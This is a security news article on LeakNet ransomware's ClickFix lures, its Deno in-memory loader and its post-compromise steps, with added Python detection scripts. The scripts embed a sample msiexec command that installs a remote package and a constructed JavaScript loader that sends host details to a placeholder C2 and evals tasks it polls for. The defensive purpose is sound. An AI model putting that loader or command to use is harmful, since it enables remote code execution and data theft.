LeakNet Ransomware Uses ClickFix on Hacked Sites to Deploy Deno In Memory Loader

Cybersecurity researchers have identified a new attack technique used by the ransomware group LeakNet that combines social engineering with a memory-based malware loader. The group is now leveraging the ClickFix tactic on compromised websites to gain initial access to victim systems.

According to analysis published by ReliaQuest, the campaign represents a strategic change in how the ransomware operation infiltrates organizations.

Instead of relying on credentials obtained from initial access brokers, the attackers now use deceptive instructions that trick users into running malicious commands themselves.

ClickFix Social Engineering Technique

The ClickFix technique relies on manipulating users into executing commands under the belief they are fixing a technical issue.

In this campaign, attackers compromise legitimate websites and display a fake CAPTCHA verification page. The page instructs visitors to copy and paste a command into the Windows Run dialog.

The command executes msiexec.exe, which begins the malware infection chain.

This approach sidesteps many traditional detection mechanisms because the process chain starts from a user-initiated action (the Run dialog) and runs through a signed, legitimate Windows binary (msiexec.exe), so controls that key on exploit activity or on attacker tooling see nothing unusual.
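Two checks a defender can run for this specific pattern, as an added example that is not ReliaQuest's detection content and not anything taken from the campaign: process-creation telemetry in which explorer.exe (the parent of anything launched from the Run dialog) spawns msiexec.exe with a remote package URL, and the RunMRU registry key, where Windows records Run-dialog history. The events, users, paths, hostnames and the RunMRU export are constructed for the example; the export is shown with unescaped values for readability.

```python
"""Two checks for the ClickFix-to-msiexec pattern described above.

Added example; not ReliaQuest's detection content and not anything from the
campaign. Assumptions: process events are Sysmon event 1 fields as dicts; a
Run-dialog launch is parented by explorer.exe; the RunMRU export below is
constructed and shown with unescaped values for readability. Hostnames,
users and paths are invented.
"""
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

# Constructed sample process-creation events (not real telemetry).
EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "msiexec /i https://update.example-cdn.test/verify.msi /qn",
     "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\msiexec.exe",          # SCCM-driven install
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": r"msiexec /i C:\Windows\ccmcache\a1\app.msi /qn",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe",
     "User": r"CORP\alice"},
]

def is_clickfix_msiexec(event):
    """msiexec.exe started under explorer.exe and told to fetch its package from a URL.

    Legitimate deployment tooling (SCCM, Intune, an installer) is the parent
    of normal msiexec activity; explorer.exe as the parent means a user typed
    or pasted the command, which is exactly what the fake CAPTCHA asks for.
    """
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    return (image.endswith("\\msiexec.exe")
            and parent.endswith("\\explorer.exe")
            and URL_RE.search(event.get("CommandLine", "")) is not None)

def remote_package_host(event):
    """Host the package was to be fetched from, for blocking/hunting, or None."""
    m = URL_RE.search(event.get("CommandLine", ""))
    return urlparse(m.group(0)).hostname if m else None

def find_clickfix(events):
    return [e for e in events if is_clickfix_msiexec(e)]

# The Run dialog also records history under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU:
# one string value per entry ending in "\1", and MRUList giving the order.
RUNMRU_EXPORT = r'''
"MRUList"="cba"
"a"="cmd\1"
"b"="powershell\1"
"c"="msiexec /i https://update.example-cdn.test/verify.msi /qn\1"
'''

def runmru_commands(export_text):
    """Commands from a RunMRU export, most recent first."""
    values, order = {}, ""
    for line in export_text.strip().splitlines():
        m = re.match(r'"(\w+)"="(.*)"$', line.strip())
        if not m:
            continue
        name, value = m.groups()
        if name == "MRUList":
            order = value
        else:
            values[name] = value[:-2] if value.endswith(r"\1") else value
    return [values[k] for k in order if k in values]

def suspicious_runmru(export_text):
    """Run-dialog entries that invoke msiexec against a remote package."""
    return [c for c in runmru_commands(export_text)
            if "msiexec" in c.lower() and URL_RE.search(c)]

if __name__ == "__main__":
    for e in find_clickfix(EVENTS):
        print(f"ClickFix msiexec launch by {e['User']} from {remote_package_host(e)}")
    for c in suspicious_runmru(RUNMRU_EXPORT):
        print("RunMRU:", c)
```

The parent-process check is what separates this from routine software deployment: msiexec under SCCM or Intune is noise, msiexec under explorer.exe with an http(s) package source is the ClickFix signature. The RunMRU check is for after the fact, when endpoint telemetry was not retained but the user's registry hive still is.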


Deno Based Loader Executes Malware in Memory

Another distinctive feature of the attack is a command-and-control loader built on Deno, a JavaScript and TypeScript runtime.

The loader runs Base64-encoded JavaScript directly in memory, so very little of the malicious code is ever written to disk.

Once executed, the loader performs several tasks:

  • Collects information about the compromised system
  • Connects to an external command and control server
  • Downloads additional malicious payloads
  • Executes further instructions in a continuous polling loop

Because the decoded script never lands on disk, file-based scanners have nothing to inspect; what remains for defenders is the process running the Deno runtime, its command line, and the network connections it makes to the command and control server.
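Where the encoded script does pass through a command line, it can be pulled apart without executing it. The following Python triage script is an added example (not the loader's code and not ReliaQuest's tooling); it assumes, which the article does not state, that the Base64 blob reaches the runtime on the command line, modelled here as `deno eval "eval(atob('<base64>'))"`. The sample script it decodes is constructed and inert, and its hostname is a placeholder. The indicators it looks for are the four behaviours the article lists: host reconnaissance, a C2 connection, download of further payloads for execution, and a polling loop.

```python
"""Triage a Base64-encoded Deno loader from a command line without running it.

Added example; not the loader's code and not ReliaQuest's tooling. Assumption
not stated by the article: the encoded script reaches the runtime via the
command line (here modelled as `deno eval "eval(atob('<base64>'))"`). The
sample script is constructed and inert; hostnames are placeholders.
"""
import base64
import re

# Constructed stand-in for a loader body: recon, register, then poll for tasks.
SAMPLE_JS = """
const C2 = "https://cdn-metrics.example.test/api/v1";
const info = { host: Deno.hostname(), os: Deno.build.os, user: Deno.env.get("USERNAME") };
await fetch(C2 + "/register", { method: "POST", body: JSON.stringify(info) });
while (true) {
  const r = await fetch(C2 + "/task");
  const task = await r.text();
  if (task) eval(task);
  await new Promise(res => setTimeout(res, 30000));
}
"""
SAMPLE_B64 = base64.b64encode(SAMPLE_JS.encode()).decode()
SAMPLE_CMDLINE = f"deno eval \"eval(atob('{SAMPLE_B64}'))\""

B64_RE = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
URL_RE = re.compile(r"""https?://[^\s"'`]+""")

def extract_b64_blobs(cmdline):
    """Long Base64-looking runs in a command line (64 chars or more)."""
    return B64_RE.findall(cmdline)

def decode_js(blob):
    """Decode a blob to text, or None if it is not valid Base64 or not text."""
    try:
        raw = base64.b64decode(blob, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None

def triage(js):
    """Static indicators matching the behaviour the article attributes to the loader."""
    return {
        "c2_urls": sorted(set(URL_RE.findall(js))),
        "host_recon": bool(re.search(r"Deno\.(hostname|build|osRelease|env)\b", js)),
        "network": "fetch(" in js,
        "dynamic_eval": bool(re.search(r"\beval\(|new Function\(", js)),
        "polling_loop": bool(re.search(r"while\s*\(\s*true\s*\)|setInterval\(", js)),
        # Sleep between polls, taken from setTimeout(<callback>, <ms>) calls.
        "sleep_ms": [int(m) for m in re.findall(r"setTimeout\([^,]+,\s*(\d+)\s*\)", js)],
    }

def loader_score(findings):
    """Number of behavioural flags set; three or more of four looks like a C2 loader."""
    return sum(findings[k] for k in ("host_recon", "network", "dynamic_eval", "polling_loop"))

def triage_cmdline(cmdline):
    """Decode every Base64 blob in a command line and triage the ones that are text."""
    results = []
    for blob in extract_b64_blobs(cmdline):
        js = decode_js(blob)
        if js is not None:
            findings = triage(js)
            findings["score"] = loader_score(findings)
            results.append(findings)
    return results

if __name__ == "__main__":
    for f in triage_cmdline(SAMPLE_CMDLINE):
        print(f"score={f['score']} c2={f['c2_urls']} sleep_ms={f['sleep_ms']}")
```

The decoded URLs and the polling interval are the parts worth acting on: the URLs feed blocking and retrospective proxy searches, and a fixed interval gives network defenders a beaconing period to look for. The scoring is deliberately coarse; the point is to surface which blobs deserve a human look, not to classify them.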

Shift Away From Initial Access Brokers

Researchers say the adoption of ClickFix gives the ransomware group greater operational flexibility.

Previously, attackers often relied on initial access brokers, third parties that sell compromised credentials to criminal groups. By moving away from that model, LeakNet can operate more quickly and at lower cost.

Additionally, the use of compromised websites instead of attacker owned infrastructure makes network detection more difficult.

Microsoft Teams Phishing Observed in Similar Intrusion

In a separate investigation, analysts also detected a phishing attempt delivered through Microsoft Teams that led to the execution of a similar Deno based loader.

While the incident has not been formally attributed, researchers believe it may represent an expansion of LeakNet’s access methods or adoption of the technique by other cybercriminal groups.

Post Compromise Activities

Once attackers establish access, LeakNet follows a consistent attack sequence.

The operation typically begins with DLL side-loading, in which a legitimate, typically signed application loads a malicious dynamic-link library placed where the application searches for it.

After gaining control, the attackers perform several actions:

  • Lateral movement using PsExec
  • Enumeration of cached Kerberos tickets using the built-in Windows command klist
  • Data exfiltration to cloud storage
  • Final deployment of ransomware encryption

To transfer stolen data, attackers use cloud infrastructure such as Amazon S3 buckets. This tactic blends malicious activity with normal cloud traffic, reducing the likelihood of detection.
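Each of the post-compromise steps above leaves a distinct trace, and the value is in seeing them together on one host. The following Python correlation is an added example, not ReliaQuest's detection logic or any LeakNet tooling; the events are constructed dicts standing in for normalised Windows telemetry (System log event 7045 for service installs, Sysmon events 1, 3 and 7 for process creation, network connections and image loads), and the stage heuristics, the bucket allow list and the approved-client list are assumptions for the example.

```python
"""Correlate the post-compromise sequence described above, per host.

Added example; not ReliaQuest's detection logic or any LeakNet tooling.
Events are constructed dicts standing in for normalised Windows telemetry
(System log event 7045 for service installs, Sysmon events 1, 3 and 7 for
process creation, network connections and image loads). The stage
heuristics, bucket allow list and client allow list are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

APPROVED_BUCKETS = {"corp-backups-prod"}        # assumption: org-owned buckets
APPROVED_S3_CLIENTS = {"backupagent.exe"}        # assumption: sanctioned uploaders
TRUSTED_DIRS = (r"c:\windows", r"c:\program files")
WINDOW = timedelta(hours=24)
STAGE_ORDER = ["sideload", "psexec", "klist", "s3_exfil"]

def classify(ev):
    """Map one event to a stage of the sequence, or None if it looks benign."""
    kind = ev["type"]
    if kind == "image_load":
        # Side-loading heuristic: a binary outside the OS and Program Files
        # trees loads an unsigned DLL sitting in its own directory.
        exe_dir = ntpath.dirname(ev["image"]).lower()
        dll_dir = ntpath.dirname(ev["loaded"]).lower()
        if not ev["signed"] and exe_dir == dll_dir and not exe_dir.startswith(TRUSTED_DIRS):
            return "sideload"
    elif kind == "service_install":
        # PsExec installs a service named PSEXESVC on the target host.
        if ev["name"].upper() == "PSEXESVC":
            return "psexec"
    elif kind == "process":
        # klist.exe lists the Kerberos tickets cached for the logon session.
        if ntpath.basename(ev["image"]).lower() == "klist.exe":
            return "klist"
    elif kind == "network":
        labels = ev["dest_host"].lower().split(".")
        is_s3 = labels[-2:] == ["amazonaws", "com"] and "s3" in labels[:2]
        if is_s3:
            bucket = labels[0] if labels[0] != "s3" else None   # virtual-hosted style only
            client = ntpath.basename(ev["image"]).lower()
            if client not in APPROVED_S3_CLIENTS or bucket not in APPROVED_BUCKETS:
                return "s3_exfil"
    return None

def correlate(events):
    """Return {host: [stages seen, in kill-chain order]} for hosts showing two or
    more stages inside WINDOW. The first occurrence of each stage is kept."""
    staged = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage and stage not in staged[ev["host"]]:
            staged[ev["host"]][stage] = datetime.fromisoformat(ev["ts"])
    alerts = {}
    for host, stages in staged.items():
        times = sorted(stages.values())
        if len(stages) >= 2 and times[-1] - times[0] <= WINDOW:
            alerts[host] = [s for s in STAGE_ORDER if s in stages]
    return alerts

# Constructed sample telemetry (hostnames, paths and bucket names invented).
EVENTS = [
    {"ts": "2025-01-15T09:00:00", "host": "WS-042", "type": "image_load",
     "image": r"C:\Users\Public\vendor\app.exe",
     "loaded": r"C:\Users\Public\vendor\version.dll", "signed": False},
    {"ts": "2025-01-15T09:05:00", "host": "WS-042", "type": "process",
     "image": r"C:\Windows\System32\klist.exe", "cmdline": "klist"},
    {"ts": "2025-01-15T09:06:00", "host": "WS-042", "type": "process",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad"},
    {"ts": "2025-01-15T09:40:00", "host": "SRV-01", "type": "service_install",
     "name": "PSEXESVC", "path": r"%SystemRoot%\PSEXESVC.exe"},
    {"ts": "2025-01-15T11:10:00", "host": "SRV-01", "type": "network",
     "image": r"C:\Users\Public\upload.exe",
     "dest_host": "staging-7f3a.s3.us-east-1.amazonaws.com", "dest_port": 443},
    {"ts": "2025-01-15T02:00:00", "host": "BK-02", "type": "network",
     "image": r"C:\Program Files\Backup\backupagent.exe",
     "dest_host": "corp-backups-prod.s3.us-east-1.amazonaws.com", "dest_port": 443},
]

if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(f"{host}: {' -> '.join(stages)}")
```

Two caveats worth keeping in mind. PsExec's service lands on the target of the lateral movement, not the source, so the PSEXESVC signal and the side-loading signal will usually sit on different hosts; a production version would join on the user account or the source address in the logon events as well. And because S3 traffic to attacker-controlled buckets is indistinguishable from sanctioned backup traffic at the network layer, the allow list of bucket names and upload clients is doing most of the work in the exfiltration check, which is an argument for maintaining such a list before an incident rather than during one.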

LeakNet Activity and Targeting

The LeakNet ransomware operation first appeared in November 2024. The group presents itself as a “digital watchdog,” claiming to support transparency and internet freedom.

However, threat intelligence company Dragos reported that the group has targeted industrial sector organizations.

Ransomware Landscape Continues to Evolve

Recent threat intelligence from Google highlights the continued activity of major ransomware groups.

The ransomware brands responsible for the highest number of claimed victims on data leak sites include:

  • Qilin
  • Akira
  • Cl0p
  • Play
  • SafePay
  • INC Ransom
  • Lynx
  • RansomHub
  • DragonForce
  • Sinobi

Security analysts noted that approximately 77% of ransomware incidents now involve data theft, up from about 57% in 2024.

Additionally, many attacks begin with the exploitation of vulnerabilities in common network devices such as VPN gateways and firewalls.
